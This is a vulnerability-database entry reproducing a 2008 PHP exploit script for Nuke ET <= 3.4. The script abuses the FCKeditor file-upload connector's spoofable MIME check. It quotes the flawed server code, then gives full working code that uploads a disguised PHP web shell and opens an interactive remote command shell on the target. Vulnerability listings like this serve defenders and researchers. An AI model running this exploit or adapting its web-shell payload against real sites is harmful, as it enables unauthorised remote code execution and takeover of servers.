Lucene search
K

Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit

🗓️ 19 Oct 2008 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

Nuke ET <= 3.4 Remote Arbitrary File Upload Exploit by EgiX. Vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php. Allows arbitrary PHP file upload due to weak MIME type check

Code

                                                &lt;?php

/*
	---------------------------------------------------------------
	Nuke ET &lt;= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
	---------------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://www.truzone.org/
	
	This PoC was written for educational purpose. Use it at your own risk.
	Author will be not responsible for any damage.
	
	[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php
	
	147.	function FileUpload( $resourceType, $currentFolder )
	148.	{
	149.		$sErrorNumber = '0' ;
	150.		$sFileName = '' ;
	151.	
	152.		if ( isset( $_FILES['NewFile'] ) &amp;&amp; !is_null( $_FILES['NewFile']['tmp_name'] ) )
	153.		{
	154.			$oFile = $_FILES['NewFile'] ;
	155.	
	156.			// Map the virtual path to the local server path.
	157.			$sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
	158.	
	159.			// Get the uploaded file name.
	160.			$sFileName = $oFile['name'] ;
	161.			$sOriginalFileName = $sFileName ;
	162.			// Security fix by truzone 01-15-2006
	163.			//$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
	164.			//$sExtension = strtolower( $sExtension ) ;
	165.	
	166.			if(extension_loaded(&quot;mime_magic&quot;)){
	167.			$sExtension = mime_content_type($oFile['tmp_name']);
	168.			}else{
	169.			$sExtension = $oFile['type'];
	170.			}
	171.			// en of security fix by truzone 01-15-2006
	172.			global $Config ;
	173.	
	174.			$arAllowed	= $Config['AllowedExtensions'][$resourceType] ;
	175.			$arDenied	= $Config['DeniedExtensions'][$resourceType] ;

	An attacker might be able to upload arbitrary files containing malicious PHP code due to the code
	near lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!
*/

error_reporting(0);
set_time_limit(0);
ini_set(&quot;default_socket_timeout&quot;, 5);

define(STDIN, fopen(&quot;php://stdin&quot;, &quot;r&quot;));

function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print &quot;\n[-] No response from {$host}:80 Trying again...&quot;;
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	return $resp;
}

function connector_response($html)
{
	return (preg_match(&quot;/OnUploadCompleted\((\d),\&quot;(.*)\&quot;\)/&quot;, $html, $match) &amp;&amp; in_array($match[1], array(0, 201)));
}

print &quot;\n+------------------------------------------------------------------+&quot;;
print &quot;\n| Nuke ET &lt;= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |&quot;;
print &quot;\n+------------------------------------------------------------------+\n&quot;;

if ($argc &lt; 3)
{
	print &quot;\nUsage......: php $argv[0] host path&quot;;
	print &quot;\nExample....: php $argv[0] localhost /&quot;;
	print &quot;\nExample....: php $argv[0] localhost /nukeet/\n&quot;;
	die();
}

$host = $argv[1];
$path = ereg_replace(&quot;(/){2,}&quot;, &quot;/&quot;, $argv[2]);

$filename  = md5(time()).&quot;.php&quot;;
$connector = &quot;FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php&quot;;

$payload  = &quot;--o0oOo0o\r\n&quot;;
$payload .= &quot;Content-Disposition: form-data; name=\&quot;NewFile\&quot;; filename=\&quot;{$filename}\&quot;\r\n&quot;;
$payload .= &quot;Content-Type: application/zip\r\n\r\n&quot;;
$payload .= &quot;PK\003\004&lt;?php error_reporting(0);print(\&quot;_code_\\n\&quot;);passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?&gt;\n&quot;;
$payload .= &quot;--o0oOo0o--\r\n&quot;;

$packet	 = &quot;POST {$path}{$connector}?Command=FileUpload&amp;Type=File&amp;CurrentFolder=%2f HTTP/1.0\r\n&quot;;
$packet	.= &quot;Host: {$host}\r\n&quot;;
$packet .= &quot;Content-Length: &quot;.strlen($payload).&quot;\r\n&quot;;
$packet .= &quot;Content-Type: multipart/form-data; boundary=o0oOo0o\r\n&quot;;
$packet .= &quot;Connection: close\r\n\r\n&quot;;
$packet .= $payload;

if (!connector_response(http_send($host, $packet))) die(&quot;\n[-] Upload failed!\n&quot;);
else print &quot;\n[-] Shell uploaded to {$filename}...starting it!\n&quot;;

$path .= str_repeat(&quot;../&quot;, substr_count($path, &quot;/&quot;) - 1) . &quot;UserFiles/File/&quot;; // come back to the document root 

$packet  = &quot;GET {$path}{$filename} HTTP/1.0\r\n&quot;;
$packet .= &quot;Host: {$host}\r\n&quot;;
$packet .= &quot;Cmd: %s\r\n&quot;;
$packet .= &quot;Connection: close\r\n\r\n&quot;;

while(1)
{
	print &quot;\nnukeet-shell# &quot;;
	$cmd = trim(fgets(STDIN));
	if ($cmd != &quot;exit&quot;)
	{
		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
		preg_match(&quot;/_code_/&quot;, $response) ? print array_pop(explode(&quot;_code_&quot;, $response)) : die(&quot;\n[-] Exploit failed...\n&quot;);
	}
	else break;
}

?&gt;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Oct 2008 00:00Current
7.1High risk
Vulners AI Score7.1
17